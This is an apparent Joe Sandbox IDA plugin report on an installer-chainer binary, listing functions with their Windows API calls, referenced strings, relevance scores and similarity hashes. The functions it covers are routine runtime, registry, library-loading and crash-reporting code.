Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$MessageSend$ItemLongPointsRectRedrawVisible
String ID:
API String ID: 3196996609-0
Opcode ID: c0e9cce1bd25cdd0536fbe176e81f6fe4317b09bffae5226846947e3522aa178
Instruction ID: 25f265fcd63b9975ddc70aff572188dc72c63a1ea70ddb2f05d586e5e513d7db
Opcode Fuzzy Hash: c0e9cce1bd25cdd0536fbe176e81f6fe4317b09bffae5226846947e3522aa178
Instruction Fuzzy Hash: C0519070214301DFDB24CF28E889B2ABBE1FF84704F144A1CF5869B2A5DB71E865CB51

Function 00280279 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00280398
___TypeMatch.LIBVCRUNTIME ref: 002804A6
_UnwindNestedFrames.LIBCMT ref: 002805F8
CallUnexpected.LIBVCRUNTIME ref: 00280613

Strings

csm, xrefs: 002802B6
csm, xrefs: 002803CF
csm, xrefs: 00280323

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 68a07f993ad5ed6f5e2e833124b673c946508b79375852bb52d0a5333b74d10a
Instruction ID: d5efc0e3edf57209f578272e075cfa974ccc361271554779c8078730d9cb9141
Opcode Fuzzy Hash: 68a07f993ad5ed6f5e2e833124b673c946508b79375852bb52d0a5333b74d10a
Instruction Fuzzy Hash: 3DB18D7982220ADFCF55EF94C8819AEB7B5FF14310B54409AE8056B292D334DE79CFA1

Function 00235810 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 233synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00235A48
GetLastError.KERNEL32 ref: 00235A59
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00235A6F
GetExitCodeProcess.KERNEL32(00000000,?), ref: 00235A80
CloseHandle.KERNEL32(00000000), ref: 00235A8E

Strings

open, xrefs: 002358F4
\\?\, xrefs: 00235892, 002359E9

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CloseCodeErrorExecuteExitHandleLastObjectProcessShellSingleWait
String ID: \\?\$open
API String ID: 1481985272-3841230862
Opcode ID: 89badfda0d407b13f2e243146bf848db6a1ef3560e26083199d2cfad787a9896
Instruction ID: 622143c875a2b2601b3f5e1830fc4b031916dcb5c559c5fbcfab9c0b1240cafa
Opcode Fuzzy Hash: 89badfda0d407b13f2e243146bf848db6a1ef3560e26083199d2cfad787a9896
Instruction Fuzzy Hash: 2D91BEB1E1061ACFDB10CFA8C8447AEB7F5FF59324F148269E819AB291D7759D01CB90

Function 0027DE10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0027DE47
___except_validate_context_record.LIBVCRUNTIME ref: 0027DE4F
_ValidateLocalCookies.LIBCMT ref: 0027DED8
__IsNonwritableInCurrentImage.LIBCMT ref: 0027DF03
_ValidateLocalCookies.LIBCMT ref: 0027DF58

Strings

csm, xrefs: 0027DEED
d', xrefs: 0027DEF5, 0027DEFE, 0027DF0F

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$d'
API String ID: 1170836740-2295037060
Opcode ID: 04ee0a5df15bef6c74952819f8c1ca2afefe8fa9d852c2dfdfc1ad5828bdd14e
Instruction ID: 66f382fd8315b3ef255a9676451993f01a3147f72c1620e1c65a4fe5908a647b
Opcode Fuzzy Hash: 04ee0a5df15bef6c74952819f8c1ca2afefe8fa9d852c2dfdfc1ad5828bdd14e
Instruction Fuzzy Hash: 8D41D634A20209ABCF11DF68C884AAEBBB5FF55324F14C056E8196B392D771ED25CF91

Function 0022F780 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,4938EAB5,Function_0006987A,00000000,?,Function_0008BEE0,000000FF,?,0022F6CB,?), ref: 0022F7B9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 0022F7C9
GetModuleHandleW.KERNEL32(Advapi32.dll,4938EAB5,Function_0006987A,00000000,?,Function_0008BEE0,000000FF,?,0022F6CB,?), ref: 0022F829
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0022F839

Strings

RegDeleteKeyTransactedW, xrefs: 0022F7C3
RegDeleteKeyExW, xrefs: 0022F833
Advapi32.dll, xrefs: 0022F7B4, 0022F824

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 1646373207-1053001802
Opcode ID: 6cea7e1dab0f4331bc67e003011c90214cde7ce521b5c02234685799e2dfd40a
Instruction ID: 7f77e07852d457216bc64b7f70ef8f4ce4caad621cda89546bc96f25bfb2aff2
Opcode Fuzzy Hash: 6cea7e1dab0f4331bc67e003011c90214cde7ce521b5c02234685799e2dfd40a
Instruction Fuzzy Hash: 47310632A19204FFDB108F94FD05FA5FBB4FB49B10F10453BE91592690DB769820CB55

Function 0023D1A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,?,?,002D8AF4), ref: 0023D1B0
LoadLibraryW.KERNEL32(Shell32.dll,?,?,002D8AF4), ref: 0023D1C3
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0023D1D3
SHGetPathFromIDListW.SHELL32(?,00000000), ref: 0023D25C
SHGetMalloc.SHELL32(?), ref: 0023D29E

Strings

SHGetSpecialFolderPathW, xrefs: 0023D1CD
Shell32.dll, xrefs: 0023D1BE

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
String ID: SHGetSpecialFolderPathW$Shell32.dll
API String ID: 2352187698-2988203397
Opcode ID: ec68ba484328dd16237d59f34cb6df533d155c9d28bac4057ed864164c7240ee
Instruction ID: fe7fb5da6ca973abd82de8a5807beaae78a023e40a3d2f87690298f125f59a2f
Opcode Fuzzy Hash: ec68ba484328dd16237d59f34cb6df533d155c9d28bac4057ed864164c7240ee
Instruction Fuzzy Hash: 883104B1A107029BEB209F24FC09B6B77F5AFD0710F45842CEC8987191EB71D8A68B91

Function 002798FD Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00279978,002798DB,00279B7C), ref: 00279914
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0027992A
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0027993F

Strings

KERNEL32.DLL, xrefs: 0027990F
w-, xrefs: 00279950
AcquireSRWLockExclusive, xrefs: 00279924
ReleaseSRWLockExclusive, xrefs: 00279934

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive$w-
API String ID: 667068680-998314914
Opcode ID: fb169025b38b5d9f5ae96da2a61e7e668958a37aeb163c9df93b314b8336993e
Instruction ID: 0fdcf86ae1a8d5d7499bf939fec340e8304c70576211f6eee428d93e47cf1d96
Opcode Fuzzy Hash: fb169025b38b5d9f5ae96da2a61e7e668958a37aeb163c9df93b314b8336993e
Instruction Fuzzy Hash: 4AF0C232B35363DB7F614EA07C895AB63DC9A03354315983ED719E6250FA74CCE2C690

Function 00224150 Relevance: 12.2, APIs: 8, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

GetErrorInfo.OLEAUT32(00000000,00000000,4938EAB5,?,?), ref: 002241BC
SysStringLen.OLEAUT32(00000000), ref: 0022429F
GetProcessHeap.KERNEL32(-000000FF,?), ref: 002242E8
HeapFree.KERNEL32(00000000,-000000FF,?), ref: 002242EE
GetProcessHeap.KERNEL32(-000000FF,00000000,?,00000000,00000000,00000000,4938EAB5,?,?), ref: 0022431B
HeapFree.KERNEL32(00000000,-000000FF,00000000,?,00000000,00000000,00000000,4938EAB5,?,?), ref: 00224321
SysFreeString.OLEAUT32(00000000), ref: 00224339
SetErrorInfo.OLEAUT32(00000000,00000000,?), ref: 002243E6

Part of subcall function 00223C80: GetProcessHeap.KERNEL32(002243D3,002243D3), ref: 00223DBD
Part of subcall function 00223C80: HeapFree.KERNEL32(00000000,002243D3,002243D3), ref: 00223DC3
Part of subcall function 00223C80: GetProcessHeap.KERNEL32(002242D4,?), ref: 00223DF7
Part of subcall function 00223C80: HeapFree.KERNEL32(00000000,002242D4,?), ref: 00223DFD

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Heap$Free$Process$ErrorInfoString
String ID:
API String ID: 976288773-0
Opcode ID: 85f900858bf682fd535e5866a91aadada39560fc21f3389a5b1631adc6bde4fb
Instruction ID: baa28d35551417b5f1cf7b7bafbb4976e1fb6ab418125b8d720c1f2af405ecef
Opcode Fuzzy Hash: 85f900858bf682fd535e5866a91aadada39560fc21f3389a5b1631adc6bde4fb
Instruction Fuzzy Hash: 2D918F70D11219EBDF10EFE8D845BEEBBB4EF05314F244259E815AB2C1DB789A14CBA1

Function 00279FF8 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,0027A1A2), ref: 0027A01C
HeapAlloc.KERNEL32(00000000,?,0027A1A2), ref: 0027A023

Part of subcall function 0027A0EE: IsProcessorFeaturePresent.KERNEL32(0000000C,0027A00A,00000000,?,0027A1A2), ref: 0027A0F0

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,0027A1A2), ref: 0027A033
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0027A1A2), ref: 0027A05A
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,0027A1A2), ref: 0027A06E
InterlockedPopEntrySList.KERNEL32(00000000,?,0027A1A2), ref: 0027A081
VirtualFree.KERNEL32(00000000,00000000,00008000,?,0027A1A2), ref: 0027A094

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 67b94bf44d452f165143572bf72fad9fbbeef035bfc1247e6cf3d7882073be0c
Instruction ID: ccf1e2be7344b6e144508eca3561157c4419b68f3254ae163a798f79456a1dd2
Opcode Fuzzy Hash: 67b94bf44d452f165143572bf72fad9fbbeef035bfc1247e6cf3d7882073be0c
Instruction Fuzzy Hash: A811E671661622ABEB311B78BD4CF2E335CEF85761F118821FD09E6150EA74CC1196A7

Function 0022EF00 Relevance: 10.8, APIs: 7, Instructions: 347stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0022F8C0: CharNextW.USER32(?,00000000,00000000,74DEF360,?,0023051F,00000000,00000000,?,?,?,00000000,00000000,002307C3,?,?), ref: 0022F8FB
Part of subcall function 0022F8C0: CharNextW.USER32(00000001,?,00000000,00000000,74DEF360,?,0023051F,00000000,00000000,?,?,?,00000000,00000000,002307C3,?), ref: 0022F91B
Part of subcall function 0022F8C0: CharNextW.USER32(00000000,?,00000000,00000000,74DEF360,?,0023051F,00000000,00000000,?,?,?,00000000,00000000,002307C3,?), ref: 0022F92B
Part of subcall function 0022F8C0: CharNextW.USER32(00000027,?,00000000,00000000,74DEF360,?,0023051F,00000000,00000000,?,?,?,00000000,00000000,002307C3,?), ref: 0022F934
Part of subcall function 0022F8C0: CharNextW.USER32(?,?,00000000,00000000,74DEF360,?,0023051F,00000000,00000000,?,?,?,00000000,00000000,002307C3,?), ref: 0022F9A0

lstrcmpiW.KERNEL32(?,002BD564,?,4938EAB5,?,00000000,00000000), ref: 0022EF87
lstrcmpiW.KERNEL32(?,002BC444), ref: 0022EF9E
VarUI4FromStr.OLEAUT32(?,00000000,00000000,?), ref: 0022F1F4
CharNextW.USER32(?,?), ref: 0022F2E5
CharNextW.USER32(00000000), ref: 0022F2FB

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CharNext$lstrcmpi$From
String ID:
API String ID: 298784196-0
Opcode ID: 647b6efe9bfe7b9a81ea7507df6f47c667883152ca821cb49bfd41a16bb913a0
Instruction ID: 0b5460adbdc206eba3ed1e3864738f2ff855c5d3a17dde2cbaa000bccc7f2d46
Opcode Fuzzy Hash: 647b6efe9bfe7b9a81ea7507df6f47c667883152ca821cb49bfd41a16bb913a0
Instruction Fuzzy Hash: D0D1E27192026AEBDF64CFA4DE84BEE77B4EF08300F10417AE955AB290E7749E54CB50

Function 0023E080 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 327COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000080,00000001,Close,50000001,?,00000128,?,00000032,0000000E,00000082,000001F5,?,50000000,?,00000026), ref: 0023E36B
DialogBoxIndirectParamW.USER32(00000000,00000000,?,0023E4B0,?), ref: 0023E3BA

Strings

Send Error Report, xrefs: 0023E2CD
Close, xrefs: 0023E284
Copy, xrefs: 0023E352
Details >>, xrefs: 0023E2F1

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: DialogHandleIndirectModuleParam
String ID: Close$Copy$Details >>$Send Error Report
API String ID: 279259766-113472931
Opcode ID: 5386d13deac87a8855fed3a198cddfd368f4bb337ea4a528a135ff74ed172c2e
Instruction ID: 17c3cb49726b32eae0b9bed26dc90908e105cd0ca19b635aedb397a5d9812be9
Opcode Fuzzy Hash: 5386d13deac87a8855fed3a198cddfd368f4bb337ea4a528a135ff74ed172c2e
Instruction Fuzzy Hash: F2C1ADB0A10609ABEF14DF64CC55BEEB7B5EF09710F114229F515BB2D0E7B0AA15CB90

Function 0023A080 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 324COMMON

Download Yara Rule

APIs

SymGetLineFromAddr.DBGHELP(?,?,?,00000002,4938EAB5), ref: 0023A12E

Part of subcall function 00239AE0: LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00239B3E
Part of subcall function 00239AE0: GetProcAddress.KERNEL32(00000000), ref: 00239B45

Strings

[0x%.8Ix] , xrefs: 0023A3F7
%hs:%ld, xrefs: 0023A2C7
-> , xrefs: 0023A583
-----, xrefs: 0023A4CC
%hs(), xrefs: 0023A4A6

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddrAddressFromLibraryLineLoadProc
String ID: -> $%hs()$%hs:%ld$-----$[0x%.8Ix]
API String ID: 2196328783-2864510326
Opcode ID: 91dff01121bc6aa3bf4f5ca2542984abe629c8f2b1a164eed7dd74b96e05804a
Instruction ID: e9ed775fff60d05455ad9dac4622eb10ee1bec466f891a3029088a235be49f9c
Opcode Fuzzy Hash: 91dff01121bc6aa3bf4f5ca2542984abe629c8f2b1a164eed7dd74b96e05804a
Instruction Fuzzy Hash: 4FE19A70D202689ADB28DF64CC987DEBBB5EF54304F1042D9E509A7281DBB86BD4CF91

Function 00259800 Relevance: 10.6, APIs: 7, Instructions: 125COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0025984D
GetForegroundWindow.USER32 ref: 00259859
SetLastError.KERNEL32(0000000E,?,?,?,4938EAB5), ref: 002598A0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$ActiveErrorForegroundLast
String ID:
API String ID: 1822391280-0
Opcode ID: e269697f60d652f6dd05fc7a8bc7460b72d5fb1ecd2c5c9c957b3ca18b00c1b2
Instruction ID: d224f2acba68bbf4399cd404d7ad36ccfada97b1645c25e447f46984572d05eb
Opcode Fuzzy Hash: e269697f60d652f6dd05fc7a8bc7460b72d5fb1ecd2c5c9c957b3ca18b00c1b2
Instruction Fuzzy Hash: 2241C531910219EBCB11DF64D849BCEBBB8FF16321F10826BE815A7291DB70AE54CB91

Function 0023CE70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0023CA10: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,4938EAB5,00000000,00000000,?), ref: 0023CA65
Part of subcall function 0023CA10: GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?,?), ref: 0023CB2C

GetFileVersionInfoSizeW.VERSION(?,00000000,Shlwapi.dll,4938EAB5,00000000,?,?,?,?,00000000,002A3695,000000FF,Shlwapi.dll,0023CE26,?), ref: 0023CEBD
GetFileVersionInfoW.VERSION(?,00000000,002A3695,?,00000000,?,?,00000000,002A3695,000000FF,Shlwapi.dll,0023CE26,?), ref: 0023CEE9
VerQueryValueW.VERSION(?,002BC42C,000000FF,?,?,?,00000000,002A3695,000000FF,Shlwapi.dll,0023CE26,?), ref: 0023CF01
GetLastError.KERNEL32(?,?,00000000,002A3695,000000FF,Shlwapi.dll,0023CE26,?), ref: 0023CF2E
DeleteFileW.KERNEL32(?), ref: 0023CF41

Strings

Shlwapi.dll, xrefs: 0023CE70, 0023CEA8

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$InfoVersion$DeleteErrorFolderLastNamePathQuerySizeTempValue
String ID: Shlwapi.dll
API String ID: 2354181036-1687636465
Opcode ID: 03858539472b132fff34bbc98ba093653ae893fd63128affaf27e1d311a8f3a4
Instruction ID: d0347430965d111ee18b7b0dc3953024b3c1041331a79522f64e748cceb92d32
Opcode Fuzzy Hash: 03858539472b132fff34bbc98ba093653ae893fd63128affaf27e1d311a8f3a4
Instruction Fuzzy Hash: 1D3192B1921209ABDF11CFA5DC44BEEFBB9FF09310F24415AE406B3240DB359A15CBA1

Function 0022F4A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,4938EAB5,?,00000000,00000000,?,00000000,Function_0008BEC0,000000FF,?,0022FD34,?,00000000), ref: 0022F4E3
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0022F50C
RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020006,00000000,4938EAB5,?,00000000,00000000,?,00000000,Function_0008BEC0,000000FF,?,0022FD34,?), ref: 0022F545
RegCloseKey.ADVAPI32(00000000), ref: 0022F558

Strings

RegOpenKeyTransactedW, xrefs: 0022F506
Advapi32.dll, xrefs: 0022F4DE

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: f4c2aa082e4e36d4a82acb6da3117ed4acb28525fbada6ab89432318e27b08cd
Instruction ID: d505ea6a14913e9bbec6fa738dbb5016c2597da42701143f571f9732746990d3
Opcode Fuzzy Hash: f4c2aa082e4e36d4a82acb6da3117ed4acb28525fbada6ab89432318e27b08cd
Instruction Fuzzy Hash: 5F21D172A14215BFEB108F98ED44FAABBB8FB08750F50853AF814D7280E775A820CB50

Function 0023CD90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Shlwapi.dll,?,00000000,?,?,?,?,?,?,00240264,?), ref: 0023CDAB
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0023CDC1
FreeLibrary.KERNEL32(00000000), ref: 0023CDFA
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00240264,?), ref: 0023CE16

Strings

Shlwapi.dll, xrefs: 0023CDAA
DllGetVersion, xrefs: 0023CDBB

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Library$Free$AddressLoadProc
String ID: DllGetVersion$Shlwapi.dll
API String ID: 1386263645-2240825258
Opcode ID: fb3b61b086af4dd70df05cd541850f37c0e522644c94d2db4c5e0fd5ebe59f4b
Instruction ID: 13b8ea3531616ebfd7fc05dc14a5c308b57ed5bf8d0d9b1ac102c5ca7161398d
Opcode Fuzzy Hash: fb3b61b086af4dd70df05cd541850f37c0e522644c94d2db4c5e0fd5ebe59f4b
Instruction Fuzzy Hash: 9921BE726143019BC700AF29E84566BB7E4BFEE711F91092DF549E3201EB31D8198BA2

Function 00275A90 Relevance: 10.6, APIs: 7, Instructions: 76COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 00275AB4
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00275AC4
GetLastError.KERNEL32 ref: 00275AD4
